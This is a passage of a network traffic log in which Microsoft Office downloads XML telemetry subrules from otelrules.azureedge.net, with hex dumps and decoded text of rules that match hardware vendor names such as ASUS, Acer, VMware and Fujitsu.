                                              2024-10-25 13:45:55 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              35192.168.2.44978013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:55 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:55 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:55 GMT
                                              Content-Type: text/xml
                                              Content-Length: 407
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                              ETag: "0x8DC582BBAD04B7B"
                                              x-ms-request-id: 3c9c0adf-d01e-0028-0c96-257896000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134555Z-16849878b78tg5n42kspfr0x4800000000h000000000e14k
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:55 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              36192.168.2.44978213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:55 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:55 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:55 GMT
                                              Content-Type: text/xml
                                              Content-Length: 427
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                              ETag: "0x8DC582BA310DA18"
                                              x-ms-request-id: 43877b29-f01e-005d-36f3-2413ba000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134555Z-r197bdfb6b4gqmwlpwzzs5v83s00000001mg000000008s2v
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:55 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              37192.168.2.44978313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:55 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:55 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:55 GMT
                                              Content-Type: text/xml
                                              Content-Length: 486
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                              ETag: "0x8DC582B9018290B"
                                              x-ms-request-id: d7788b78-601e-0084-2f37-266b3f000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134555Z-15b8d89586fhl2qtatrz3vfkf000000006h00000000096kw
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:55 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              38192.168.2.44978413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:55 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:55 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:55 GMT
                                              Content-Type: text/xml
                                              Content-Length: 407
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                              ETag: "0x8DC582B9698189B"
                                              x-ms-request-id: 7de7ed35-901e-005b-7c14-222005000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134555Z-16849878b78x6gn56mgecg60qc000000029g00000000nu3x
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:55 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              39192.168.2.44978513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:55 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:56 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:55 GMT
                                              Content-Type: text/xml
                                              Content-Length: 469
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                              ETag: "0x8DC582BBA701121"
                                              x-ms-request-id: 2fd6bd5d-d01e-007a-394f-26f38c000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134555Z-16849878b78qf2gleqhwczd21s00000000ug00000000a4xn
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:56 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              40192.168.2.44978613.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:55 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:56 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:55 GMT
                                              Content-Type: text/xml
                                              Content-Length: 415
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                              ETag: "0x8DC582BA41997E3"
                                              x-ms-request-id: 3edebaab-e01e-0033-21c8-214695000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134555Z-16849878b78bcpfn2qf7sm6hsn000000027000000000az0t
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:56 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              41192.168.2.44978713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:55 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:56 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:56 GMT
                                              Content-Type: text/xml
                                              Content-Length: 477
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                              ETag: "0x8DC582BB8CEAC16"
                                              x-ms-request-id: 94fafadb-001e-0049-3f27-265bd5000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134556Z-r197bdfb6b4hsj5bywyqk9r2xw00000001ug00000000gzwu
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:56 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              42192.168.2.44978913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:56 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:56 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:56 GMT
                                              Content-Type: text/xml
                                              Content-Length: 494
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                              ETag: "0x8DC582BB7010D66"
                                              x-ms-request-id: 78a5d0bc-501e-005b-6da6-26d7f7000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134556Z-16849878b788tnsxzb2smucwdc000000097000000000k4rc
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:56 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              43192.168.2.44978813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:56 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:56 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:56 GMT
                                              Content-Type: text/xml
                                              Content-Length: 464
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                              ETag: "0x8DC582B97FB6C3C"
                                              x-ms-request-id: 1a39e609-901e-0048-60a3-26b800000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134556Z-16849878b78fmrkt2ukpvh9wh4000000096g00000000epag
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:56 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              44192.168.2.44979013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:56 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:56 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:56 GMT
                                              Content-Type: text/xml
                                              Content-Length: 419
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                              ETag: "0x8DC582B9748630E"
                                              x-ms-request-id: b26f0bb8-d01e-00ad-3518-26e942000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134556Z-15b8d89586fcvr6p5956n5d0rc00000006bg00000000aqeq
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:56 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              45192.168.2.44979113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:56 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:56 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:56 GMT
                                              Content-Type: text/xml
                                              Content-Length: 472
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                              ETag: "0x8DC582B9DACDF62"
                                              x-ms-request-id: 864201cb-901e-0015-2b18-26b284000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134556Z-16849878b78p8hrf1se7fucxk800000001hg000000004tps
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
